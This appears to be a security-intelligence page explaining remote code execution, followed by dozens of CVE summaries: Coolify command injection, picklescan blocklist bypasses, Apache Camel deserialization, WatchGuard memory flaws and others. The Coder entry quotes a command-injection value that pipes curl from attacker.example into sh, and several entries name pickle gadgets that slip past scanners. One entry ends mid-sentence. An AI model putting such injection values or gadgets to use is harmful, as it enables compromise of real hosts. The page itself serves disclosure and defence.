Remote Code Execution
Remote Code Execution represents the critical moment when an attacker successfully runs arbitrary code on a target system without physical access.
How It Works
Remote Code Execution represents the critical moment when an attacker successfully runs arbitrary code on a target system without physical access. Unlike a single vulnerability class, RCE is an outcome—the catastrophic result of exploiting underlying weaknesses in how applications process input, manage memory, or handle executable content.
Attackers typically achieve RCE by chaining vulnerabilities or exploiting a single critical flaw. Common pathways include injecting malicious payloads through deserialization flaws (where untrusted data becomes executable objects), command injection (where user input flows into system commands), buffer overflows (overwriting memory to hijack execution flow), or unsafe file uploads (placing executable code on the server). Server-Side Template Injection and SQL injection can also escalate to code execution when attackers leverage database or template engine features.
The attack flow usually begins with reconnaissance to identify vulnerable endpoints, followed by crafting a payload that exploits the specific weakness, then executing commands to establish persistence or pivot deeper into the network. Modern exploits often use multi-stage payloads—initial lightweight code that downloads and executes more sophisticated tooling.
Impact
- Complete system compromise — attacker gains shell access with application privileges, potentially escalating to root/SYSTEM
- Data exfiltration — unrestricted access to databases, configuration files, credentials, and sensitive business data
- Lateral movement — compromised server becomes a beachhead to attack internal networks and other systems
- Ransomware deployment — direct pathway to encrypt files and disable backups
- Persistence mechanisms — installation of backdoors, web shells, and rootkits for long-term access
- Supply chain attacks — modification of application code or dependencies to compromise downstream users
Real-World Examples
The n8n workflow automation platform (CVE-2024-21858) demonstrated how RCE can emerge in unexpected places-attackers exploited unsafe workflow execution to run arbitrary code on self-hosted instances. The Log4j vulnerability (Log4Shell) showed RCE at massive scale when attackers sent specially crafted JNDI lookup strings that triggered remote class loading in Java applications worldwide.
Atlassian Confluence instances have faced multiple RCE vulnerabilities through OGNL injection flaws, where attackers inject Object-Graph Navigation Language expressions that execute with server privileges. These required no authentication, enabling attackers to compromise thousands of internet-exposed instances within hours of disclosure.
Mitigation
- Input validation and sanitization — strict allowlists for all user-controlled data, especially in execution contexts
- Sandboxing and containerization — isolate application processes with minimal privileges using containers, VMs, or security contexts
- Disable dangerous functions — remove or restrict features like code evaluation, system command execution, and dynamic deserialization
- Network segmentation — limit blast radius by isolating sensitive systems and restricting outbound connections
- Web Application Firewalls — detect and block common RCE patterns in HTTP traffic
- Runtime application self-protection (RASP) — monitor application behavior for execution anomalies
- Regular patching — prioritize updates for components with known RCE vulnerabilities
Recent CVEs (31864)
Remote command injection in Coolify (self-hosted PaaS) before 4.0.0-beta.469 lets an authenticated user with application write permissions inject OS commands through deployment-handling fields such as dockerfile_location, achieving arbitrary code execution on the deployment host and exfiltrating secrets via deployment logs. The flaw scores CVSS 9.9 because command injection breaks out of the application context to compromise the underlying server (scope change), exposing environment variables and other applications' secrets. No public exploit has been identified at time of analysis, but the fix is available in tagged release v4.0.0-beta.469.
Remote code execution in the Langroid Python LLM-agent framework allows an attacker who can influence LLM prompts to escape the intended sandbox and run arbitrary OS commands on the host. The flaw affects TableChatAgent.pandas_eval() and the VectorStore base class, which pass LLM-generated expressions to Python's eval() with an empty locals dict but an unscrubbed globals dict, leaving __builtins__ implicitly available. A full working proof-of-concept is included in the advisory (publicly available exploit code exists); CVSS is scored 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), though real-world exploitation is gated on the non-default full_eval=True setting.
Unauthenticated SSRF in Dragonfly's scheduler v1 gRPC service allows any remote client to force the scheduler to issue HTTP GET requests to arbitrary internal addresses, including loopback (127.0.0.1), cloud metadata endpoints (169.254.0.0/16), and RFC1918 ranges. The scheduler's `DownloadTinyFile()` function constructs HTTP requests from attacker-controlled `PeerHost.Ip` and `PeerHost.DownPort` gRPC fields with no destination address validation, and stores up to 128 bytes of each fetched response in `Task.DirectPiece`, which is subsequently served to other peers. The input tag of 'RCE' in the source intelligence is incorrect - this is a read-SSRF with a limited exfiltration path, not remote code execution. A fully confirmed proof-of-concept exists against v2.4.4-rc.2; no patched release version has been identified at time of analysis.
Arbitrary file write in Crawl4AI (the open-source LLM-friendly web crawler by unclecode) before version 0.9.0 lets a malicious website or download control where crawled files land on disk, and because the file contents are also attacker-controlled this escalates to remote code execution. Both the HTTP crawler path (trusting the response Content-Disposition filename) and the browser crawler path (trusting the download's suggested filename) are affected. CVSS is 9.6 (Critical); no public exploit is identified at time of analysis and it is not listed in CISA KEV, but a fix commit and GHSA advisory are published.
Server-side template injection in Formie, a forms plugin for Craft CMS 5 (verbb/formie 3.0.0-beta.1 through 3.1.26), allows unauthenticated attackers to inject Twig syntax through request-controlled inputs that Hidden fields use as dynamic default values. When a public form contains a Hidden field seeded from the User Agent, Referer, Current URL, a query parameter, or a cookie, the attacker-supplied value reaches Craft's Twig rendering layer and is evaluated server-side, potentially yielding information disclosure, application-state modification, or remote code execution. No public exploit identified at time of analysis, though the flaw is tagged RCE/SSTI and rated CVSS 9.8.
Privilege escalation in the Plesk web hosting control panel lets an authenticated low-privileged user abuse an improper authorization flaw in the XML API to inject arbitrary configuration directives, achieving arbitrary file write as root and full compromise of the underlying server. Rated CVSS 9.9 with a scope change, this turns any valid panel account into root on the host; no public exploit identified at time of analysis and it is not listed in CISA KEV.
Remote code execution in Adobe ColdFusion 2025.9, 2023.20 and all earlier releases lets an unauthenticated network attacker run arbitrary code in the context of the current user via improper input validation (CWE-20), with no user interaction and a scope change to other components. Adobe rates this maximum severity (CVSS 10.0) and self-reported it; there is no public exploit identified at time of analysis and it is not yet listed in CISA KEV. Given ColdFusion's long history of mass-exploited RCE flaws, patching should be treated as urgent despite the current absence of a public PoC.
Untrusted Java deserialization in Apache OpenNLP's SvmDoccatModel (libsvm document categorization module, versions 3.0.0-M1 through before 3.0.0-M4) lets an attacker who supplies a crafted serialized stream to the public static SvmDoccatModel.deserialize(InputStream) trigger deserialization of an arbitrary object graph before the SvmDoccatModel cast occurs. Where a usable gadget chain exists on the consuming application's classpath, this yields remote code execution in the loading JVM; OpenNLP ships no gadget itself, so realistic risk falls on downstream apps that embed the module alongside vulnerable transitive dependencies. No public exploit identified at time of analysis and the flaw is not in CISA KEV, though the SSVC assessment marks it automatable with partial technical impact.
Remote code execution in ownCloud 10 (before 10.15.3) lets an authenticated administrator abuse a relative path traversal weakness to write or reference files outside intended directories and execute arbitrary code on the server. The high-privilege requirement (PR:H) and high attack complexity (AC:H) constrain who can trigger it, but successful exploitation yields full compromise with a scope change beyond the application context. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV.
Server-side request forgery escalating to remote code execution in the SharePoint for ownCloud app (versions prior to 0.4.1, bundled with ownCloud 10 before 10.15.3) lets an already-authenticated administrator coerce the server into making attacker-controlled requests that ultimately run arbitrary code on the host. The flaw is tagged RCE/SSRF and carries an 8.5 CVSS with a scope change (S:C), reflecting that abuse of the SharePoint integration crosses a trust boundary into the underlying system. No public exploit identified at time of analysis and it is not listed in CISA KEV, so this is a patch-and-move-on issue rather than an active-threat emergency.
Arbitrary code execution in ownCloud Core (ownCloud 10 Classic server, all versions before 10.15.3) allows an administrator to abuse an exposed dangerous method in the Updater component to run code on the server host. Any actor holding administrative credentials - legitimately, or via session hijack/credential theft/CSRF against an admin - can convert web-app admin rights into full server compromise. No public exploit identified at time of analysis and it is not listed in CISA KEV; the vendor-issued GHSA-hvcx-ph66-mmvw advisory and the fix in 10.15.3 are the primary confirmation.
Stack-based memory corruption in GIMP's PNM image parser lets an attacker execute code or crash the application when a victim opens a malicious PNM/PBM/PGM/PPM file. The flaw is an off-by-one in pnmscanner_gettoken() that writes a null terminator one byte past a stack buffer; it is local and requires the user to open the crafted file (UI:R). No public exploit is identified at time of analysis, and EPSS is low (0.12%), consistent with the CISA SSVC 'Exploitation: none' judgment.
Unauthenticated denial-of-service in elixir-mint's hpax (the HPACK header-compression library for Elixir HTTP/2, versions 0.1.1 through 1.0.3) allows a remote attacker to force superlinear (~O(N²)) CPU consumption by sending a small header block containing an HPACK integer with a long run of continuation octets. Because BEAM integers are arbitrary-precision, the decoder builds an ever-growing bignum with no upper bound, turning a few crafted bytes into a large, attacker-controlled amount of CPU and transient memory - a classic decompression/amplification DoS. No public exploit is identified at time of analysis and it is not in CISA KEV, but a vendor patch (version 1.0.4) is available.
Java object deserialization in the Apache Camel camel-pqc component allows code execution in the key-management application when an attacker who can write to the backing AWS Secrets Manager secret stores a malicious serialized payload. The flaw affects Apache Camel 4.18.0-4.18.2 and 4.19.0-4.20.x, where AwsSecretsManagerKeyLifecycleManager.deserializeMetadata() calls a raw ObjectInputStream.readObject() with no class filter, so gadget side effects fire before the KeyMetadata cast. Rated CVSS 9.8 by Apache, but exploitation genuinely requires IAM write access to the specific secret; there is no public exploit identified at time of analysis and EPSS is low at 0.19% (8th percentile).
Remote code execution via unsafe Java deserialization affects the camel-pqc component of Apache Camel 4.18.0-4.18.2 and 4.19.0-4.20.x. The HashiCorp Vault and AWS Secrets Manager KeyLifecycleManager implementations (and a legacy-migration path in the file-based manager) read post-quantum key metadata back with a raw ObjectInputStream.readObject() lacking any ObjectInputFilter or allow-list, so a principal able to write to the key backend can plant a gadget object that executes during normal key-lifecycle operations. No public exploit has been identified at time of analysis and EPSS is low (0.19%), but SSVC rates technical impact as total; this is an incomplete-remediation follow-on to CVE-2026-40048.
Unauthenticated Camel control-header injection in Apache Camel's camel-cometd component (4.0.0 before 4.14.8, 4.15.0 before 4.18.3, and 4.19.0 before 4.21.0) lets any client that completes a Bayeux/CometD handshake inject internal headers such as CamelHttpUri, CamelFileName or CamelJmsDestinationName into the Camel Exchange, hijacking the behaviour of downstream producers. Because a CometdComponent installs no Bayeux SecurityPolicy by default, no authentication is required (PR:N), and the injected headers survive internal direct/seda/vm hops. Reported by Apache with a fix in 4.21.0; there is no public exploit identified at time of analysis and EPSS is low at 0.19% (9th percentile).
Remote code execution in the Apache Camel camel-hazelcast component allows an attacker who can join or reach the Hazelcast cluster to run arbitrary code on every Camel node. The flaw exists because Camel-created Hazelcast instances apply no Java deserialization filter by default, so crafted serialized objects sent over the cluster protocol are deserialized (ObjectInputStream.readObject) before Camel processes them. It affects Camel 4.0.0-4.14.7, 4.15.0-4.18.2, and 4.19.0-4.20.x whenever a hazelcast consumer or repository uses Camel's own default configuration; there is no public exploit identified at time of analysis and EPSS is low (0.49%, 39th percentile).
Remote code execution in Apache Camel's camel-vertx-http component (4.0.0-4.14.7, 4.15.0-4.18.2, 4.19.0) arises when a producer endpoint deserializes 5xx HTTP response bodies marked application/x-java-serialized-object through a raw java.io.ObjectInputStream with no class filtering. Exploitation is limited to non-default deployments where transferException=true or allowJavaSerializedObject=true is set and throwExceptionOnFailure remains true, letting an attacker who controls or intercepts the backend deliver a malicious serialized object and, given a gadget chain on the classpath, run code on the Camel host. This is a vendor-reported (Apache) issue with a publicly available advisory; there is no public exploit identified at time of analysis and EPSS is low at 0.39% (31st percentile).
Authenticated remote code execution in the FileOrganizer WordPress plugin before 1.2.0 lets users granted file-manager access upload arbitrary PHP files because several file-management operations skip file-type validation. Publicly available exploit code exists, and the flaw is an incomplete fix of CVE-2024-7985, which only hardened the upload operation while leaving other file-management endpoints unvalidated. With CVSS 3.1 base 8.8 (PR:L) and a working PoC, any low-privileged account with file-manager rights - extendable to sub-administrator roles via the premium add-on - can achieve full site compromise.
Authentication bypass in Apache Camel's camel-keycloak component (versions 4.15.0-4.18.2 and 4.19.0-4.20.x) allows any caller presenting a non-null Authorization: Bearer header value - including an arbitrary string or a forged, unsigned JWT - to bypass Keycloak token verification entirely and access routes protected by KeycloakSecurityPolicy. The cryptographic token checks (signature, issuer, expiry) are embedded exclusively inside role and permission validation routines that are never invoked when requiredRoles and requiredPermissions are empty, which is the documented default 'Basic Setup.' Where the protected route connects to a code-execution-capable Camel producer, this authentication bypass can escalate to unauthenticated remote code execution; no public exploit has been identified at time of analysis.
Remote PHP code injection in stumasy's calculator module allows unauthenticated network attackers to execute arbitrary server-side code by manipulating the `mathematical_sentence` parameter passed unsanitized into PHP's `eval()` function in calculate.php. A public proof-of-concept exploit exists (GitHub issue #5), and no patch has been released - the project maintainer has not responded to the disclosure. The rolling release model means no fixed version can be cited; the vulnerability is present through at least commit 327d1b0f2915ba79d7ef8ebb74553e987609d9be.
Code injection in TidGi-Desktop up to version 0.13.0 allows remote attackers to execute arbitrary code through the application's Git Repository Import feature, specifically within the sub-wiki loading worker. The flaw resides in `src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts`, where externally-sourced Git repository content is processed without adequate code-injection safeguards (CWE-94). A public exploit has been disclosed and referenced via the GitHub security advisory GHSA-9hc2-hjx8-q6pv, though no CISA KEV listing exists at time of analysis.
Code injection in SourceCodester Multi-Vendor Online Grocery Management System 1.0 allows remote low-privileged attackers to execute arbitrary PHP code by manipulating the `content[]` argument passed to the `update_settings_info` function in `classes/SystemSettings.php`. A public proof-of-concept exploit has been disclosed on GitHub, and exploitation requires only a low-privileged authenticated session over the network. No CISA KEV listing exists, but the public exploit materially lowers the barrier for opportunistic attacks against any internet-exposed instance.
Arbitrary code execution bypass in Trail of Bits fickling (versions ≤ 0.1.10) allows attackers to craft malicious pickle files that the tool's check_safety() gate rates LIKELY_SAFE with zero findings. Because the standard-library modules _posixsubprocess, site, and atexit are missing from the UNSAFE_IMPORTS denylist in fickle.py, payloads invoking _posixsubprocess.fork_exec, site.execsitecustomize, or atexit._run_exitfuncs pass the scanner and are then deserialized and executed by fickling.load(), which chains check_safety() into pickle.loads() as its security gate. No public exploit has been identified at time of analysis, and no EPSS or KEV signals are present in the input, but the advisory documents the exact bypass primitives.
Authenticated OS command injection in the myVesta hosting control panel lets a low-privileged user inject arbitrary shell commands through the v_ftp_user parameter during FTP-account deletion, escalating to full command execution as the admin user and takeover of the panel. Publicly available exploit code exists (documented by ProjectBlack/PRJBLK) and a vendor fix commit has been published, though no CISA KEV listing or EPSS data is provided. Because a scope change moves the attacker from a low-privilege panel account to admin-level command execution, this is a high-impact privilege-escalation-to-RCE path.
Malicious code execution via scanner bypass affects picklescan before 0.0.34, a security tool used to vet pickle files for unsafe deserialization before loading ML model artifacts. The scanner fails to flag the _operator.methodcaller built-in, so an attacker can craft a pickle that passes picklescan's malware check yet executes arbitrary code the moment a victim calls pickle.load(). No public exploit has been identified at time of analysis, and the flaw is not on CISA KEV; the fix landed in version 0.0.34.
Detection bypass in picklescan before 0.0.33 lets attackers slip malicious pickle files past its security scanner by using operator.methodcaller, a callable the scanner's blocklist did not recognize. Any ML pipeline, model hub, or workflow that trusts picklescan to vet untrusted pickle/model files is affected, because a crafted payload will be marked safe yet execute arbitrary code the moment the file is deserialized. No public exploit identified at time of analysis and the flaw is not in CISA KEV, but the bypass technique is straightforward and the issue is tagged RCE by the reporting source (VulnCheck).
Security-scanner bypass in Picklescan before 0.0.33 lets attackers smuggle arbitrary-code-execution payloads past its safety checks by abusing the numpy.f2py.crackfortran.getlincoef gadget inside a pickle __reduce__ method, which the scanner fails to flag as dangerous. Because Picklescan is used to vet shared machine-learning model files, a malicious pickle passes as 'clean' and then executes attacker-controlled Python when the trusting downstream consumer deserializes it. No public exploit is identified at time of analysis, and it is not listed in CISA KEV; the CVSS 4.0 score is 7.6 and the attack depends on a victim actually loading the file.
Safety-check bypass in picklescan before 0.0.28 allows attackers to smuggle malicious pickle files past the scanner by abusing torch.utils.data.datapipes.utils.decoder.basichandlers as a reduce gadget, so a payload the tool reports as clean still executes arbitrary code when the victim deserializes it. Because picklescan is a defensive scanner used to vet untrusted ML models (notably in Hugging Face workflows), this blind spot converts a trusted safety gate into a false sense of security. No public exploit identified at time of analysis, and it is not on CISA KEV; CVSS 4.0 base score is 7.6.
Security-scanner detection bypass in picklescan before 0.0.34 lets attackers slip malicious pickle files past its checks by invoking _operator.attrgetter inside a reduce method, so a file the scanner reports as clean still executes arbitrary code when pickle.load() deserializes it. The flaw affects ML/AI supply-chain pipelines that rely on picklescan to vet untrusted model files. No public exploit identified at time of analysis; the issue was reported by VulnCheck and fixed in 0.0.34.
Security-scanner evasion in picklescan before 0.0.28 lets attackers slip malicious pickle files past its safety checks by abusing the torch.utils.bottleneck.__main__.run_cprofile call, which the scanner's blocklist does not recognize as dangerous. Any ML pipeline or platform that relies on picklescan to vet untrusted models will therefore approve a weaponized file, and the embedded code runs with arbitrary execution when the victim deserializes it. No public exploit identified at time of analysis; not listed in CISA KEV, but VulnCheck published a dedicated advisory and the technique is fully documented.
Detection bypass in picklescan before 0.0.30 lets a crafted pickle smuggle the asyncio.unix_events._UnixSubprocessTransport._start built-in past the scanner's malicious-opcode checks, so a model or pickle that picklescan reports as safe actually executes arbitrary OS commands when a victim deserializes it. Because picklescan is a security scanner used to vet untrusted ML artifacts (e.g. in AI model supply chains), this false-negative turns a trusted safety gate into a blind spot. No public exploit identified at time of analysis and it is not on CISA KEV, but the technique is fully described in the VulnCheck advisory.
Detection bypass in picklescan before 0.0.29 lets attackers slip malicious pickle payloads past the scanner by abusing lib2to3.pgen2.grammar.Grammar.loads inside a pickle reduce method, resulting in remote code execution when the file is later deserialized with pickle.load(). Because picklescan is trusted as a safety gate for machine-learning model files, a bypass converts a 'scanned and clean' verdict into silent arbitrary code execution. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV, though the technique is concretely described in the VulnCheck advisory.
Security-scanner evasion in picklescan before 0.0.33 lets attackers smuggle malicious pickle files past its detection engine by abusing the numpy.f2py.crackfortran.param_eval function inside a pickle reduce method, so a payload the scanner declares safe still triggers arbitrary code execution when the application deserializes it. This defeats the exact protection picklescan exists to provide, endangering ML pipelines that rely on it to vet untrusted model/pickle files (e.g., Hugging Face-style workflows). No public exploit is identified at time of analysis and it is not in CISA KEV, though VulnCheck published an advisory.
Malicious-pickle detection bypass in picklescan before 0.0.30 allows attackers to smuggle undetected remote code execution payloads past the scanner by abusing the torch.utils.bottleneck.__main__.run_autograd_prof gadget, which was absent from picklescan's dangerous-import blocklist. Because picklescan is used as a security gate to vet untrusted ML model files, a false-negative here means a crafted model passes as safe and executes arbitrary code when subsequently deserialized. Reported by VulnCheck via GHSA-4whj-rm5r-c2v8; no public exploit identified at time of analysis, and it is not on CISA KEV.
Malicious pickle detection bypass in picklescan before 0.0.30 lets attackers hide code that runs during pickle.load, because the scanner does not flag the idlelib.run.Executive.runcode primitive used in a reduce method. Since picklescan is a security tool relied upon to vet PyTorch/ML model files, this bypass turns a trusted safety check into a false 'clean' verdict, enabling remote code execution and supply-chain attacks against anyone loading an attacker-supplied model. Reported by VulnCheck; no public exploit identified at time of analysis and not listed in CISA KEV.
Arbitrary code execution in the NLTK Python library (nltk/nltk 3.9.3 and earlier) allows an attacker to run untrusted Java code when a victim loads a malicious JAR through five Stanford interface wrappers (StanfordPOSTagger, StanfordNERTagger, StanfordParser, StanfordDependencyParser, StanfordNeuralDependencyParser). These classes pass a user-controllable JAR path to an internal java() helper that calls subprocess.Popen() with no SHA256 integrity check, so a substituted or poisoned JAR executes with the user's privileges. This is a regression of CVE-2026-0848, whose SHA256 verification fix was applied only to StanfordSegmenter and never propagated to these five classes; no public exploit is identified at time of analysis, though a huntr bounty report exists.
Arbitrary code execution in keras-team/keras 3.14.0 lets remote attackers run OS-level commands by supplying a malicious serialized `Lambda` layer that is deserialized without an active `SafeModeScope`. The root cause is `_raise_for_lambda_deserialization()` treating a `None` `safe_mode` (the default when `from_config()` runs outside a `SafeModeScope`) as if it were an explicit `False`, so the safe-mode guard is skipped and attacker-controlled `marshal` bytecode executes. SSVC rates technical impact as total with a proof-of-concept available; EPSS is modest at 0.40% (32nd percentile), and the flaw is not in CISA KEV.
Heap-based buffer overflow in GIMP's Paint Shop Pro (PSP) image format parser lets an attacker achieve arbitrary code execution or crash the application when a victim opens a maliciously crafted PSP file. The flaw stems from incorrect buffer-size arithmetic on low bit-depth images, and affects GIMP as shipped across Red Hat Enterprise Linux 6 through 9. There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV; exploitation requires local file-open interaction (CVSS 7.3).
webpack-dev-server 5.2.5 and earlier crash the entire Node.js host process when an unauthenticated remote peer sends either an HTTP request with a malformed Host header or a WebSocket upgrade to the /ws endpoint with a malformed Origin header. The malformed value bypasses graceful error handling in the host-validation path, triggering an uncaught exception that terminates the dev server process entirely. Impact is confined to availability - no confidentiality loss and no code execution occur despite a misleading 'RCE' tag in the source intelligence, which appears to be a mislabeling inconsistent with the vendor description and CVSS vector (C:N/I:N). No public exploit or CISA KEV listing exists at time of analysis.
Arbitrary shortcode execution in the CURCY Multi Currency for WooCommerce WordPress plugin (versions up to and including 2.2.14) allows unauthenticated attackers to invoke any registered WordPress shortcode by sending a crafted request to a vulnerable action handler in frontend/cache.php. The root cause is a failure to validate the shortcode value before passing it to do_shortcode(), meaning any shortcode registered on the site - including those that expose user data, perform database queries, or render sensitive page content - can be triggered without authentication. No public exploit has been identified at time of analysis, and no CISA KEV listing is present, though the low attack complexity and zero-authentication requirement elevate practical risk above what the moderate CVSS score suggests.
Remote code execution and privilege escalation in HPLIP (HP Linux Imaging and Printing) affects the hpcups print filter across Red Hat Enterprise Linux 6 through 10, where an integer overflow triggered by specially crafted print data can corrupt memory. This is an incomplete-fix follow-up to CVE-2026-8631, meaning the original patch did not fully close the flaw, and no public exploit has been identified at time of analysis. The Red Hat CVSS of 9.8 reflects a network-reachable, unauthenticated attack path, though realistic exploitation depends on how the CUPS print pipeline is exposed.
Arbitrary file deletion in the Printcart Web to Print Product Designer for WooCommerce WordPress plugin (versions up to and including 2.5.2) lets unauthenticated attackers delete any file on the server, potentially escalating to remote code execution. The store_design_data() function builds a filesystem path from the attacker-controlled 'nbd_item_key' POST value and the nonce guarding the AJAX action can be freely retrieved by anonymous users, so exploitation needs no login. No public exploit has been identified at time of analysis, but the network-reachable, no-privilege profile makes this a high-priority patch.
Local privilege escalation to SYSTEM in ASUS Business Manager lets a low-privileged local user run arbitrary code by tampering with an inter-process communication (IPC) message that the software's privileged service trusts. Because the SYSTEM-level component controls a file name or path based on attacker-influenced IPC input (CWE-73), a standard user can coerce it into loading or executing attacker-chosen content. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV; ASUS is the reporter and has issued a security advisory.
Authenticated command execution in WatchGuard Fireware OS lets a privileged administrator escalate a specially crafted CLI command into arbitrary code execution via an out-of-bounds write (CWE-787). The flaw affects a very broad version span (Fireware OS 11.0 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2), placing most currently and historically deployed WatchGuard Firebox appliances in scope. No public exploit identified at time of analysis and the issue is not listed in CISA KEV; the CVSS 4.0 score of 8.6 reflects full confidentiality/integrity/availability impact once the required privileged access is obtained.
Remote code execution in WatchGuard Fireware OS (the operating system powering Firebox network security appliances) allows an authenticated privileged administrator to run arbitrary code on the firewall by sending specially crafted requests to the Management Web UI, which trigger an out-of-bounds write in the networkd process. The flaw spans a wide version range (11.8 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2) and carries a CVSS 4.0 base score of 8.6 (High). It was reported by WatchGuard's own PSIRT; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Remote code execution in WatchGuard Fireware OS (the firmware powering WatchGuard Firebox firewall appliances) allows an unauthenticated attacker positioned on the same local/adjacent network segment to trigger an out-of-bounds write and execute arbitrary code. The flaw spans a wide firmware range - 11.0 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2 - and was self-reported by WatchGuard via its PSIRT. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the network-adjacent, unauthenticated, high-impact profile makes it a serious perimeter-device concern.
Remote code execution in WatchGuard Fireware OS affects Fireboxes running a Mobile User VPN with IKEv2 that authenticates against an external LDAP server. A race condition in the IKEv2 LDAP authentication path can be driven into a use-after-free (CWE-416) inside the iked daemon, letting a remote unauthenticated attacker execute arbitrary code in the context of that process. No public exploit identified at time of analysis, and the CVSS 4.0 base score of 9.2 is tempered by high attack complexity and a probabilistic attack requirement (AC:H/AT:P), reflecting the difficulty of reliably winning the race.
Authenticated arbitrary code execution in WatchGuard Fireware OS (12.1-12.12 and 2025.1-2026.2) arises from an out-of-bounds write in the wgagent process, reachable when a privileged user sends specially crafted requests to the Management Web UI. A high-privilege attacker (or one who has compromised admin credentials) can corrupt memory to run code on the firewall appliance, undermining the security gateway itself. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV.
Arbitrary code execution in WatchGuard Fireware OS (the firmware powering Firebox network security appliances) arises from an out-of-bounds write in the ikestubd process, reachable through the Management Web UI. An authenticated user holding privileged (administrative) access can send specially crafted requests to corrupt memory and execute code on the appliance. No public exploit identified at time of analysis and the issue is not listed in CISA KEV; risk is bounded by the requirement for existing privileged access.
Signature forgery and denial-of-service in Libreswan's IKEv1 RSA authentication allows a remote unauthenticated attacker to impersonate an IKE peer or crash the daemon. The flaw lives in RSA_authenticate_hash_signature_raw_rsa(), which fails to validate the length of the authentication hash inside a PKCS #1 (RFC 2313) encoded SIG payload; when a peer uses a small RSA public exponent such as e=3, a Bleichenbacher-style forgery becomes feasible. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the impersonation impact against IKEv1 raw-RSA authentication makes this a high-severity issue (CVSS 8.1); remote code execution is explicitly not possible and X.509 certificate verification is unaffected.
Peer impersonation and denial-of-service in Libreswan IPsec/IKEv2 arises from improper DER/ASN.1 digest verification in RSA_authenticate_hash_signature_pkcs1_1_5_rsa() when the IKEv2 AUTH payload uses RSASSA-PKCS1-v1_5 signatures. A remote unauthenticated attacker can mount a Bleichenbacher-style forgery to impersonate a peer when small RSA public exponents (e.g., e=3) are in use, or send an undersized hash to trip an assertion that aborts and restarts the daemon for sustained DoS. A vendor patch is available and there is no public exploit identified at time of analysis; RCE is not possible and X.509 certificate verification of the peer is unaffected.
Denial of service in the Libreswan IPsec VPN's pluto daemon allows remote unauthenticated attackers to crash and repeatedly restart the daemon by sending an invalidly formatted IKEv2 fragment. The off-by-one flaw affects any deployment permitting IKEv2 connections that do not explicitly set fragmentation=no, with no authentication or user interaction required; repeated exploitation sustains the outage. No public exploit identified at time of analysis, and no remote code execution is possible despite the mislabeled 'RCE' tag.
Local code execution in Notepad3 (versions through 6.25.822.1) arises from an insecure LoadLibrary(L"MSFTEDIT.DLL") call in the About-dialog path within src/Notepad3.c. Because the DLL is loaded by bare name, an attacker who can drop a malicious MSFTEDIT.DLL into the application directory or an earlier search-order location runs arbitrary code as the current user once that user opens the About dialog. No public exploit identified at time of analysis, and EPSS is low at 0.18% (8th percentile), consistent with a local, user-interaction-dependent flaw rather than a mass-exploitation target.
Authentication-bypass leading to remote code execution in 9router (npm package 9router) lets attackers reach spawn-capable MCP routes that were meant to be loopback-only. This is an incomplete fix for CVE-2026-46339: the local-only gate in src/dashboardGuard.js decides 'local' from attacker-controllable Host and Origin headers instead of the TCP source address, so any proxied or tunneled (Cloudflare Tunnel / Tailscale) deployment can be tricked into treating remote requests as local. Combined with the deterministic, machine-ID-derived CLI token, a remote attacker can inject JSON-RPC into MCP child processes (node, python, npx, etc.) and execute code on the host; no public exploit identified at time of analysis, though detailed reproduction steps are published in the vendor advisory.
Heap out-of-bounds writes in jxl-oxide's jxl-grid crate allow attacker-controlled memory corruption on 32-bit platforms when decoding a crafted JPEG XL image, potentially leading to arbitrary code execution. An integer overflow in AlignedGrid's width×height length calculation produces an undersized backing buffer for huge logical dimensions, after which rendering writes through mutable subgrids beyond the allocation. Publicly available exploit code exists in the advisory (miri/ASan PoC tests); no active exploitation is reported (not in CISA KEV) and no EPSS score was provided.
Double-free memory corruption in GIMP's PSP file format parser exposes local users to denial of service and potential arbitrary code execution when opening a specially crafted Paint Shop Pro image file. The flaw in read_layer_block() allows heap memory corruption that reliably crashes GIMP and, in a more sophisticated exploitation scenario, could enable arbitrary code execution with the privileges of the victim user. No public exploit has been identified and this vulnerability does not appear in the CISA KEV catalog, though upstream tagging of the issue as RCE-capable warrants patching in environments where GIMP users may open untrusted image files.
Arbitrary file deletion in the TinyPNG (JPEG, PNG & WebP image compression) plugin for WordPress affects all versions through 3.6.13, allowing authenticated attackers with author-level access or higher to delete any file the web server can reach. Because deleting sensitive files such as wp-config.php pushes the site into a fresh-install state, this file-deletion primitive can be escalated to full remote code execution. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, but it was disclosed by Wordfence with a clear exploitation path and carries a CVSS 8.1 (High).
Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry `dotfiles` module, which interpolated the user-controlled `dotfiles_uri` into a shell script without validation. Combined with the Create Workspace page's `mode=auto` deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied `dotfiles_uri` (e.g. `foo$(curl attacker.example/x | sh).com`), turning it into a one-click RCE against any authenticated user who clicks. CVSS is 8.8 (High) with EPSS at 2.28% (81st percentile); there is no public exploit identified and it is not in CISA KEV, though a proof-of-concept URL is documented in the advisory.
Landray OA contains an unauthenticated HQL injection vulnerability that allows unauthenticated attackers to query arbitrary Hibernate entity classes by injecting malicious HQL syntax into the uid. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.
Redsea Cloud eHR contains an arbitrary file upload vulnerability that allows unauthenticated attackers to achieve remote code execution by uploading malicious files through the PtFjk.mob servlet. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.
Yonyou KSOA 9.0 contains an unauthenticated arbitrary file upload vulnerability in the com.sksoft.bill.ImageUpload servlet that allows unauthenticated attackers to upload arbitrary files by. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.
